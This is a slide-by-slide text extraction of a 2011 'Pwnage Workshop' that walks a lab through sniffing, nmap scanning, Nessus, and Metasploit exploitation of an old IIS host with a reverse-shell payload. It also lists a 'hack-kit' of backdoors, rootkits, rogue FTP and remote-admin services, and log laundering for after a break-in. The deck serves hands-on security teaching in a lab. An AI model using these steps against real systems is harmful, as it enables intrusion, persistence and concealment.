Pwnage Workshop Beta 8 14 2011

8/3/2019 Pwnage Workshop Beta 8 14 2011

1/81

Pwnage Workshop

From zero to hero Level 1 ScriptKiddie


2/81

Table of contents

Legal

Overview

Requirements Entering the Lab

The scenario

5 intro to backtrack Lets get started


3/81

Legal

To be able to join this workshop you have

to agree that you are completely responsible

about what are you doing after you left this

room. We encourage you: dont use this tools

and technics to be evil.


4/81

Overview

This workshop is set in the earliest 2000s, our

aim is to let you know some hacking technics

from basic networking to exploiting machines

trough a hands on workshop.

Enjoy!


5/81

Requirements

Human:1. Basic Microsoft Windows knowledge

2. Basic Linux knowledge

3. Basic Vmware knowledge

4. Basic networking knowledge

5. Patience

6. Respect7. Then GOTO 5

Hardware: Computer/Laptop

2+ GB RAM

Ethernet AND Wireless access

Software: Vmware

Virtualized version of Backtrack


6/81

Entering the Lab

Identify yourethernet lan network.

Disable LAN tcp IPv4& IPv6

Open Vmware Virtual Network Editor

Identify or create a network,Bridged it with your ethernet lan.

Just plug your ethernet cable in the designated swith.


7/81

Entering the Lab

Go to your backtrack virtual machine and right

click on the networking icon placed at the

bottom right.

Select custom,

and select the

name of the

network bridgedto lan.


8/81

Storyline


9/81

The scenario

What you know.

There should be something behind the switch.

What you dont know. Everything else.


10/81

5 intro to backtrack

The /pentest/ directory

Most of the programs can be run from shell

The desktop (run startx on terminal)

See multiples terminals at the same time andalso for running Maltego


11/81

5 intro to backtrack

Finding tools

The $PATH

echo $PATH

The find command

root@bt:~# find / -name nmap root@bt:~# find /pentest/ -name '*.dic

Terminate running program

Control + C

And of course TAB for autocompleting and the arrow to use your

previously typed commands


12/81

Lets get started

Challenge 1: Obtain IP address.

Challenge 2: Detect/Define our victim.

Challenge 3: Service recognition. Challenge 4: Vulnerability detection.

Challenge 5: Exploiting vulnerability.

Challenge 6: Gain remote access.

Challenge 7: Remote network recognition.

Challenge 8: Exploiting Remote machines.


13/81


14/81


So you are in the middle of idk just connected

your plug and nothing happened, what can we

do? Logging in Backtrack

For user pass read the welcome screen in BT

Bringing up your Ethernet interface.

Ifconfig eth0 up

Assigning the right IP address to your pc.


15/81

First we listenTo be able to obtain a valid IP we can listen into

the network and see if it give us some tipe ofwhich one is the right IP range.

Intro to Network Sniffers

What are sniffers?Promiscuous mode

Sniffing with Tcpdump



16/81

Intro to Network Sniffers

What are sniffers?

Promiscuous mode



17/81

Sniffing with tcpdump

List devicesroot@bt:~# tcpdump -D

1.eth0

2.usbmon1 (USB bus number 1)

3.any (Pseudo-device that captures on all interfaces)

4.lo

Select the right device and start listening

root@bt:~# tcpdump -i eth0

tcpdump: WARNING: eth0: no IPv4 address assigned

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

See something? See too much? Try filtersroot@bt:~# tcpdump -n arp -i eth0

root@bt:~# tcpdump -n tcp -i eth0

tcpdump -n tcp and dst port 23 -i eth0



18/81

You found the right IP range!!!

Set up your ip addressroot@bt:~# ifconfig eth0 192.168.1.6/24



19/81

Mission List



Challenge 3: Service recognition.

Challenge 4: Vulnerability detection.






20/81


21/81


The art of scanning:

What is scanning

Ping? Pong!

Dissection of a scan one packet at time.

Netcat, nmap, amap


22/81

What is scanning

Ping? Pong! Ping sweep: A method that can establish a range of IP addresses which map to live hosts.

Example: nmap -sn 192.168.69.0/24

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-14 15:58 EDT

Nmap scan report for 192.168.69.1

Host is up (0.0031s latency).

MAC Address: 00:21:29:AA:A6:89 (Cisco-Linksys)



MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)


Host is up.

Nmap done: 256 IP addresses (3 hosts up) scanned in 3.48 second



23/81


Dissection of a ping sweep one packet at time.

Wireshark: View of a Ping sweep


24/81

Now its your time, find your victim.



25/81

Mission List










26/81


27/81


Ports & port scanning.

Services

What are services Detecting services

Banner recognition


28/81

Ports Port: A port is an application serving as a communications endpoint. It is used by the transport protocols

of the Internet Protocol Suite, such as Transmission Control Protocol (TCP) and User Datagram Protocol(UDP).

The port numbers are divided into three ranges: the Well Known Ports, the Registered Ports, and theDynamic and/or Private Ports.

The Well Known Ports are those from 0 through 1023. (ftp, telnet, tftp)

The Registered Ports are those from 1024 through 49151 (socks , ms-sql, mysql)

The Dynamic and/or Private Ports are those from 49152 through 65535

TCP & UDP

http://www.iana.org/assignments/port-numbers



29/81

Port Scanningroot@bt:~# nmap -n -p1-65535 192.168.69.104




Not shown: 65533 closed ports

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http


Nmap done: 1 IP address (1 host up) scanned in 37.48 seconds



30/81

Wireshark port scan capture


3 way handshake


31/81

Services:

Some services:

Ssh, dhcp, dns, authentication, proxy, email, web,snmp, ftp, tftp



32/81

Banner recognitionroot@bt:~# nmap -n -p22 -sV 192.168.69.104


Nmap scan report for 192.168.69.104Host is up (0.0020s latency).

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 5.1p1 Debian 8 (protocol 2.0)


Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds



33/81

Wireshark service detection capture



34/81

Closing chapter 3

After you got the results, lets create a generalknowledge of the results:

How many machines?

Which Oss?

Which ports?

Which Services? Which Software?

Are server or desktop machines?



35/81

2 Free TIPs

Browsing the servicesBrowse 2 common services with their corresponding client

Use netcat to connect to the services

Why dont we try to recognize the SO running on each

machine?Try:

Nmap O host



36/81

Mission List










37/81


38/81


What are vulnerabilities IETF RFC 2828 define vulnerability as:

A flaw or weakness in a system's design,implementation, or operation and management that

could be exploited to violate the system's security policy

Playing with Nessus What is Nessus

Installing Nessus on Backtrack Creating policies

Understanding the results


39/81


Is a vulnerability scanner bla bla bla.

Installing Nessus on backtrackWe are going to connect our backtrack machine to the public internet in order to

retrieve Nessus from their home site. Unbridge and bridge to your wireless

dhcpclient

Nessus.org register (as home user)

Obtain your code (check inbox)

Paste the command in a shell

Go to create user

Rebridge to your ethernet

Re set to your first ip

Nessus start

Browse into https:yourip:8834



40/81



Installing Nessus on backtrack

Creating policies The Nessus interface is kind of intuitive. Take 5 minutes to create your own policy (keep in mind the

results from the previous stages).

Now after you did it, please dont forget to also include thefollowing plugins:

CGI abuses RPC

Web Servers

Windows


41/81

Playing with Nessus

Installing Nessus on backtrack

Creating policies

Understanding the results

If results !=0 then go read them, again take your time.

From the results which machines are vulnerable?



42/81

Mission List










43/81


44/81

Creating your hack-kit

Using exploits:

Simple exploits The Metasploit framework



45/81

Creating your hack-kitHack-kit is your own set of tools, for

backdooring/administrating/protecting your new server you

will upload after you break on a server.In general you would like to upload:

Process/services tools: Lists/kill process.

File transfer tools: Normally an FTP.

Administration tools: Access to remote desktop.

Covering tracks: Logs laundry.

Hiding your stuff: Rootkits.

Maintaining access: Backdoors.

Expansion tools: scanners and more exploits.

Hardening: Patches, Services Packs.



46/81

Proposed tools

Listing/killing process and port scanning.This tools let you take a look from the command line about who is running on the remote server, as well starting remoterecognaince.

Fport.exe Fport 2.0

KILL.EXE

T

LIST

.EXE dfind.exe

Client/Administration tools:Let you administrate remotely your rogue services

Remote administrator 2.1

Serv-u administrator 3

Rogue FTP-serverSimple and powerfull FTP server

WINMGNT.EXE

ServUDaemon.ini

Rogue Remote Administration toolIf you want remote desktop, here is a solution, telnet and file transfer capabilities included as well

AdmDll.dll

r_server.exe

raddrv.dll

settings.reg



47/81

How to use the tools.

Installing rogue services

The important capabilities of this rogues services are the chance

to install them as services and from the command line.

So once you are in the remote shell, transfer your

hackkit(pack.exe) and run the following commands



48/81


49/81


50/81


What are exploits.

Why they are funny.

Where you can find them. How to use them.

Compiling

T

esting executing


51/81

What are exploits.

An exploit is a piece of software, a chunk of data, or sequence of commands that takesadvantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behaviorto occur on computer software, hardware, or something electronic . This frequently includes suchthings as gaining control of a computer system, allowing privilege escalation or a denial of service

attack.

Types

Exploits are commonly categorized and named by these criteria:

The type of vulnerability they exploit

Whether they need to be run on the same machine as the program that has the vulnerability(local) or can be run on one machine to attack a program running on another machine(remote).

The result of running the exploit (Remote access, privilege escalation, DoS, data leak, etc.)



52/81


What are exploits.

Why they are funny. Because they could give us unauthorized access to something (data,

remote machine, and/or become administrator).


53/81


How an exploit looks like.


54/81



55/81


Meanwhile in a veryvery very secure

server


56/81



57/81


Back to our very very

very secure server.

Well, thanks for the

info.You bad service,

spited a file and then

went to sleep?

COMMON


58/81


59/81


What are exploits.

Why they are funny.

Where you can find them.


60/81

Where you can

find them.There are multiple sites, one of

them is exploit-db.com with ahuge lists of exploits for

multiple softwares.



61/81

Some others things about exploits: Public exploits vs private exploits.

Open source vs closed/compiled ones.

Protected, fakes, bobytraps and rootkiteds.

And we also have Metasploit.



62/81


What are exploits.

Why they are funny.

Where you can find them. How to use them.

Compiling

Testing

executing


63/81

Using Metasploit Setting up metasploit to attack a machine: Select the exploit, the victim, and what do you want to do on that machine,

profit.

First, you have to know the module name (its on the nessus output)

Run metasploit/pentest/exploits/framework3/msfconsole

Search for the exploit

show exploits Start using the exploit

Info windows/iis/ms01_026_dbldecode

Use windows/iis/ms01_026_dbldecode

Ask for the configShow options

Minumin requirements

set RHOST 192.168.1.11

Set the payloadset payload /generic/shell_reverse_tcp

Ask for the configSet LHOST YOURIP

Exploit!

NOW WHAAAAAAAAAAAAAAAAAAAATTTTTTT



64/81



65/81



66/81

Mission List










67/81


68/81


You hacked it, right, now what?

Installing channels or something, remoteadministrator, serv-u, netcat


69/81

Mission List










70/81


71/81

Challenge 7: Remote network

recognition.

We have to go deeper

Scanning the LANHere we are going to use some tool from our

hackkit, dfind


72/81

Mission List









h ll l i i


73/81

Challenge 8: Exploiting Remote

machines.

So you detected some machines, you detected

some services, now its time to exploit them.

What tools can we use to exploit remote

vulnerabilities?

Ch ll 8 E l i i R


74/81


machines.

Exploiting remote Windows Machines

Analyzing dfind results

Searching for vulnerabilitys info available

Prepare the exploit

Profit

Ch ll 8 E l i i R


75/81


machines.

Exploiting remote Linux Machines

Analyzing dfind results

Searching for vulnerabilitys info available

Prepare the exploit

Profit

Ch ll 8 E l i i R


76/81


machines.

Once you have one

Man in the middle attacks (ettercap) Dns poisoning

Exploiting browsers


77/81


78/81


79/81

Super Secret Network Topology


80/81

Machines and their vulnerabilities

Exploiting Windows NT 4 from Nessus to Metasploit. (IIS)

Red Hat 6.2 7350wu.c Wu-ftpd v2.6.0 remote root exploit.

Backtrack Nessus Metasploit autopwn: KABOOM!!! Hacking windows 2000.


81/81

Challenge List









Pwnage Workshop Beta 8 14 2011

Documents

Transcript of Pwnage Workshop Beta 8 14 2011